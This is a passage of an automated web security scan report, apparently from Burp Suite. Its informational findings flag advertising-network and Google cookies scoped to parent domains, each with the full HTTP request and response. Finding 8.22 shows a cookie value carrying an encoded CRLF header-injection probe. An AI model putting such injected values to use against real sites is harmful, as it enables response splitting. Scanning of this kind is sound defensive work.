GET /m_yahoo.gif?xid=ubi_mxMoC3tX768OUEdNOoo8 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:44 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F82e0303e4a9098b0c77927fc;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:44 GMT
Cache-Control: no-store
Content-Length: 42
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="NOI DSP COR NID"
Via: 1.1 bfi061004 (MII-APC/2.1)

GIF89a.............!.......,........@..D.;

8.16. http://i.w55c.net/ping_match.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:14:15 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=RUBICON&rurl=http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4210%26nid%3D1523%26put%3D_wfivefivec_%26expires%3D10 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; optout=1

Response

HTTP/1.1 302 Found
Date: Wed, 07 Sep 2011 14:14:15 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:14:15 GMT
Cache-Control: private
Content-Length: 0
X-Version: DataXu Pixel Tracker v3
Location: http://pixel.rubiconproject.com/tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10
Via: 1.1 bfi061004 (MII-APC/2.1)
Content-Type: text/plain

8.17. http://id.google.com/verify/EAAAAJ5qotIJ8Qa1PsQzLO_KCTk.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAJ5qotIJ8Qa1PsQzLO_KCTk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=50=7DcJ8TkxZNuojatwkS_Hu7O0sJMqlxF_nzrxj0mfuw=5NnmLWq9agBvrwLy; expires=Thu, 08-Mar-2012 14:14:01 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAJ5qotIJ8Qa1PsQzLO_KCTk.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=oTAg0OH1iUX1aGNgIW2wChfkIoSLJt8xuDMfOFyxVg=oGRBdwqM85CGy488; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=SvhSQwwc_f05ytceKz3t_muBbRrFYuwb4q2aMa6_eczHxS7UwVoND78j00dvnenEHEPde95OEOC0FEEsn_DBzr_g2116E6t-KYynBReKkeRqJkxn8r7XlTtVkBWfyFJ5

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=50=7DcJ8TkxZNuojatwkS_Hu7O0sJMqlxF_nzrxj0mfuw=5NnmLWq9agBvrwLy; expires=Thu, 08-Mar-2012 14:14:01 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Wed, 07 Sep 2011 14:14:01 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

8.18. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PUBRETARGET=78_1409703834.82_1409705283.571_1410012888; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw&piggybackCookie=uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; PUBRETARGET=78_1409703834.82_1409705283

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:44 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

8.19. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/21770-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:20:20 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk15=04e8588ddc890c2ebd61ea165; expires=Wed, 07-Sep-2011 15:20:20 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses15=12338^12&12590^77; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63579; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-15.js?cb=46812628&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^7&12590^7; rdk=7725/12338; rdk2=0; ses2=12338^12&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:20:20 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:20:20 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddc890c2ebd61ea165; expires=Wed, 07-Sep-2011 15:20:20 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^12&12590^77; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63579; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3195

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...

8.20. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/21770-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:12 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=12338^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63947; path=/; domain=.rubiconproject.com
csi15=3212309.js^1^1315404852^1315404852&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:14:12 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-15.js?cb=721461&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; csi15=1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7725/12338; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:12 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:12 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Wed, 07-Sep-2011 15:14:12 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63947; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3212309.js^1^1315404852^1315404852&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:14:12 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2135

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3212309"
...[SNIP]...

8.21. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/21770-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:16:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk2=04e8588ddfde552dd9c270269; expires=Wed, 07-Sep-2011 15:16:27 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses2=12338^10&12590^103; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63812; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-2.js?cb=25504210&keyword=ndm|news.home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk15=1; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; cd=false; lm="7 Sep 2011 14:14:54 GMT"; rdk=7725/12338; rdk2=0; ses2=12338^4&12590^2

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:27 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:16:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddfde552dd9c270269; expires=Wed, 07-Sep-2011 15:16:27 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^10&12590^103; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63812; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2289

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3191335"
...[SNIP]...

8.22. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/21770-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:17:15 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=12338^6&12590^2568bf%250d%250ae6d071c9e42; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63764; path=/; domain=.rubiconproject.com
csi2=3165011.js^3^1315404895^1315405035&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; expires=Wed, 14-Sep-2011 14:17:15 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-2.js?cb=94406255&keyword=ndm|news.home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; cd=false; lm="7 Sep 2011 14:14:54 GMT"; rdk=7725/12338; rdk2=0; ses2=12338^5&12590^2; csi2=3165011.js^1^1315404895^1315404895&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:15 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:17:15 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0"; expires=Wed, 07-Sep-2011 15:17:15 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^6&12590^2568bf%250d%250ae6d071c9e42; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63764; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3165011.js^3^1315404895^1315405035&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; expires=Wed, 14-Sep-2011 14:17:15 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1886

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3165011"
...[SNIP]...

8.23. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22678-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:24:35 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:24:35 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses15=12338^19&12590^14; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63324; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22678-15.js?cb=9938969&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^16&12590^6; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:24:35 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:24:35 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:24:35 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^19&12590^14; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63324; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3195

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...

8.24. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22678-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:21:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk2=04e8588ddb08ddb10f49af8be; expires=Wed, 07-Sep-2011 15:21:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses2=12338^40&12590^82; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63502; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

